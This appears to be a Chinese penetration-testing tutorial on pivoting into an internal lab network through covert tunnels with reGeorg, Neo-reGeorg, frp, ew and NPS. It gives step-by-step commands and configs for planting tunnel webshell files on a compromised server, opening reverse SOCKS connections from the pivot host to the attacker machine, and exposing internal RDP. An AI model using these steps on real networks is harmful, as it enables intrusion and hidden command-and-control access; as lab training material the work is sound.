别低头,皇冠会掉;别流泪,贱人会笑。
本文首发于先知社区,原创作者即是本人
0x00 前言
构建内网隐蔽通道,从而突破各种安全策略限制,实现对目标服务器的完美控制。
当我们从外网成功获得攻击点的时候,通过反弹shell、端口转发、内网穿透等技巧,来进一步入侵内网服务器。当我们取得内网目标服务器的控制权限,通过隧道技术绕过网络限制,实现隐蔽C2服务器的通信。
网络拓扑:
data:image/s3,"s3://crabby-images/0b818/0b818f7518045010e57384dab8880b2c8cb3c15d" alt=""
网络配置IP如下:
攻击机:
win10:192.168.1.6
kali:192.168.1.7
靶场:
VM1:对外边界服务器,win7
192.168.52.143
192.168.1.5
VM2:域成员,2003
192.168.52.141
VM3:域控,2008
192.168.52.138
0x01 reGeorge
1.1 环境
攻击机kali
reGeorge软件,下载:https://github.com/sensepost/reGeorg
运行程序需要的环境:
Python、pip、urllib3;
1.2 部署配置
上传tunnel.nosocket.php
前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),server-bt系统的跳板机是php环境,将reGeorge中的tunnel.nosocket.php上传至网站
data:image/s3,"s3://crabby-images/a3bc7/a3bc7f2e1ea0c10f7fcaa84112b2573f45be2b5a" alt=""
并访问http://192.168.1.5/tunnel.nosocket.php
访问成功
data:image/s3,"s3://crabby-images/e7c60/e7c60ccb4a9037ae3142e158813688db53a454bb" alt=""
启动reGeorg
python reGeorgSocksProxy.py -p 1090 -u http://192.168.1.5/tunnel.nosocket.php
表示本地1090端口的流量都转发给指定的那个url,1090是指定的监听端口;
data:image/s3,"s3://crabby-images/9ae90/9ae904e5e0a63b0c716bcb29ace13b4ede4a72d7" alt=""
配置代理
然后配置proxychains代理链的配置文件vim /etc/proxychains.conf,将代理设置成本机的1090端口:socks5 127.0.0.1 1090
data:image/s3,"s3://crabby-images/f5b6c/f5b6c573bc1e511b97794612e76700e999fdc2a8" alt=""
1.3 测试
命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)
proxychains curl http://192.168.52.143
data:image/s3,"s3://crabby-images/32e0a/32e0a50dfca6978ebf7300b81c7c1c175d570343" alt=""
reGeorg控制端
data:image/s3,"s3://crabby-images/92c23/92c2382d8b8e54e8c164f0f1518ff7a4ead51d2a" alt=""
0x02 Neo-reGeorg
1.1 使用
设置密码并生成隧道文件,运行后会生成一个neoreg_server目录,里面包含了各种语言类型的隧道文件
$ python3 neoreg.py generate -k <password>
[+] Create neoreg server files:
=> neoreg_server/key.txt. # 密码
=> neoreg_server/tunnel.nosocket.php
=> neoreg_server/tunnel.js
=> neoreg_server/tunnel.php
=> neoreg_server/tunnel.ashx
=> neoreg_server/tunnel.aspx
=> neoreg_server/tunnel.tomcat.5.jsp
=> neoreg_server/tunnel.tomcat.5.jspx
=> neoreg_server/tunnel.jsp
=> neoreg_server/tunnel.jspx
python3 neoreg.py generate -k jdxyxd
data:image/s3,"s3://crabby-images/fc6e5/fc6e5b07fc100d810918244d94f8d3ba5a280588" alt=""
1.2 部署配置
上传tunnel.php
前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),server-bt系统的跳板机是php环境,将reGeorge中的tunnel.php上传至网站
data:image/s3,"s3://crabby-images/ca844/ca844f890efb9caee667916a05668bdd5efddbfe" alt=""
并访问http://192.168.1.5/tunnel.php
访问成功
data:image/s3,"s3://crabby-images/8c2e7/8c2e7afdd68dfce1152de99b73035c43d3af5497" alt=""
启动Neo-reGeorg
python3 neoreg.py -k jdxyxd -u http://192.168.1.5/tunnel.php #表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;
data:image/s3,"s3://crabby-images/11656/116564df303fb2e6f3eeea3453f01d0b76be8dbf" alt=""
配置代理
然后配置proxychains代理链的配置文件vim /etc/proxychains.conf,将代理设置成本机的1080端口:socks5 127.0.0.1 1080
data:image/s3,"s3://crabby-images/0e163/0e1639abac102a674eb131a75d8bb775bfc3f661" alt=""
1.3 测试
命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)
proxychains curl http://192.168.52.143
data:image/s3,"s3://crabby-images/da275/da275ff9c118118af8a2fc8e27ab2f62dce8dbb5" alt=""
0x03 frp
软件:frp_0.33.0_windows_amd64 ,frp_0.34.1_linux_amd64
代理工具Proxifier(windows下通常用可视化的proxifier、SocksCap64,Linux在proxychains设置)
1.1 攻击机为windows环境
frp的Socks5反向代理:
(HTTP反向代理修改plugin模块和proxifier代理类型即可)
攻击机-服务端:
设置frps.ini
[common]
bind_port = 7000
data:image/s3,"s3://crabby-images/d92e9/d92e995f123497289cf2a3c477d0c8d36626c5f3" alt=""
然后运行
frps.exe -c frps.ini
data:image/s3,"s3://crabby-images/0f835/0f835f9a27feee89ebdde7abaa534be171edbe71" alt=""
跳板机-客户端:server_addr为攻击机IP
设置frpc.ini
[common]
server_addr = 192.168.1.6
server_port = 7000
[socks5]
type = tcp
remote_port = 8010
plugin = socks5
data:image/s3,"s3://crabby-images/6cb97/6cb97b04c73d27d801ffd31c8afe1b977f23f5f0" alt=""
然后运行
frpc.exe -c frpc.ini
data:image/s3,"s3://crabby-images/c8297/c8297645af6ef59203a93f1a49c012eead316e8e" alt=""
SwitchyOmega配置
data:image/s3,"s3://crabby-images/6fb6f/6fb6f95b5f6515a3738ca28be835275b56d1462f" alt=""
浏览器访问192.168.52.143 访问成功
data:image/s3,"s3://crabby-images/22460/22460bbdd721dc9566112caaf794c43386fcf9b7" alt=""
proxifier配置
data:image/s3,"s3://crabby-images/97f50/97f504f66bb8161b76d7a7ccb342dc7acaf575e8" alt=""
浏览器访问192.168.52.143 访问成功
data:image/s3,"s3://crabby-images/bc729/bc729b340f78a16f117424e7cce5e27e86cf9aec" alt=""
0x04 ew
1.1 攻击机为kali环境
ew正向代理
1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)
ew_for_win_32.exe -s ssocksd -l 1090
data:image/s3,"s3://crabby-images/d5d7f/d5d7f553e91d47c9015ed721042c2e43968b6775" alt=""
这里还需要修改proxychains.conf配置文件
$ vim /etc/proxychains.conf socks5 192.168.1.5 1090
data:image/s3,"s3://crabby-images/8e49f/8e49f42f5727309ada1b01222d0817407c11ae2b" alt=""
测试执行:
proxychains curl http://192.168.52.143/
data:image/s3,"s3://crabby-images/1a357/1a35788dd5baa9413f0b2919d2665e57fd0a09ea" alt=""
ew反向代理
服务端-攻击机kali
执行:
./ew_for_linux -s rcsocks -l 1080 -e 1024
data:image/s3,"s3://crabby-images/8afdb/8afdba290d18fe73d96ebbc16b50a37bafb54eaa" alt=""
客户端-跳板机
执行
ew.exe -s rssocks -d 192.168.1.7 -e 1024
data:image/s3,"s3://crabby-images/c82d8/c82d899e5f53565b36ccb25fab5011f25ab4103b" alt=""
配置proxychains代理链
在配置文件/etc/proxychains.conf,
将代理设置成本机的1080端口(root用户修改):
data:image/s3,"s3://crabby-images/0d781/0d7818b511c18cecc351d8830460ed9cf28bbaee" alt=""
测试执行:
proxychains curl http://192.168.52.143/
data:image/s3,"s3://crabby-images/313f8/313f8840163955ddf00d7dab5fcb97a47048cd86" alt=""
0x05 NPS隐秘隧道搭建
1)建立连接
此场景攻击机使用Kali,在攻击机运行命令"./nps install"安装服务端,如图所示。
data:image/s3,"s3://crabby-images/34e1b/34e1bd421133dadc12851a7d9560b5e16b134362" alt=""
运行命令"nps start"启动服务端,如图所示。
data:image/s3,"s3://crabby-images/6bf64/6bf64f03466ffddf2476695b8bb7d5a196143e06" alt=""
通过8080端口访问服务端的Web界面,如图所示。
data:image/s3,"s3://crabby-images/70ef0/70ef0dba4b19fcc29092ce9352669d1105b7dad9" alt=""
输入默认用户名、密码admin、123登录,登录后可以看到默认客户端连接端口为8024,登录后的Web界面如图所示。
data:image/s3,"s3://crabby-images/9647f/9647fe9b6874eb0add55bf569de4fe1f02c481b7" alt=""
添加客户端,如图所示,配置唯一验证密钥,验证密钥在从客户端连接到服务端时使用,此处配置为"any",然后开启压缩和加密传输。
data:image/s3,"s3://crabby-images/765fc/765fc74a18583c17cc818b6c4b5d0f8d262b10f9" alt=""
最后在边界主机运行命令"npc.exe -server=192.168.1.7:8024 -vkey=any"来连接服务端,建立连接如图所示。
data:image/s3,"s3://crabby-images/caf2d/caf2d1a771d17d5ebf81a6d8021a4a9145cddbbd" alt=""
连接成功后在攻击机的Web界面可看到客户端上线,如图所示。
data:image/s3,"s3://crabby-images/5319f/5319f201a9bbd790eea75dc3632cfa7414320cbd" alt=""
2)TCP隧道
客户端上线后便可以通过Web界面单击上线的客户端、查看选项、配置隧道,例如,若想访问内网主机的3389端口,则可通过TCP隧道将内网主机的3389端口映射到攻击机的1111端口,单击"新增",配置目标"192.168.52.143:3389",配置服务端口为"1111",TCP隧道如图所示。
data:image/s3,"s3://crabby-images/5424a/5424a4835e8a9b705bce51bca00fc353962347cb" alt=""
TCP隧道建立成功后,即可通过连接攻击机的1111端口来连接内网主机的远程桌面,在攻击机运行命令"rdesktop 192.168.1.7:1111"连接本地的1111端口,隧道的使用如图所示。
data:image/s3,"s3://crabby-images/77bd5/77bd52a59677537934204cd4885b950d03172b78" alt=""
3)SOCKS5代理
若想搭建HTTP代理或SOCKS代理,只需选择对应模式,填写服务端端口即可,以SOCKS为例,选择模式为"SOCKS代理",如图所示,服务端端口为"1234"。
data:image/s3,"s3://crabby-images/6c29f/6c29fe37b454582032312a20f8cfa806a99b96c8" alt=""
配置好SOCKS代理后,便可使用攻击机192.168.1.7的1234端口访问内网,配置代理服务器
data:image/s3,"s3://crabby-images/7c789/7c7892a254b33977fddf7400ca683c6f59377f58" alt=""
访问内网主机站点http://192.168.52.143/
使用代理如图所示。
data:image/s3,"s3://crabby-images/d5c68/d5c688f761220919625605bb81ae03f2d2331c68" alt=""
或者配置proxifier
data:image/s3,"s3://crabby-images/08699/0869971498851f30f1d94050d4d1f10eaafd248d" alt=""
访问内网主机站点http://192.168.52.143/
data:image/s3,"s3://crabby-images/6d532/6d5329a3fa4ef46c525aa2477c8fc6b7c0f37511" alt=""
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
bash
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog
公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
博客:
https://rdyx0.github.io/
先知社区:
https://xz.aliyun.com/u/37846
SecIN:
https://www.sec-in.com/author/3097
FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85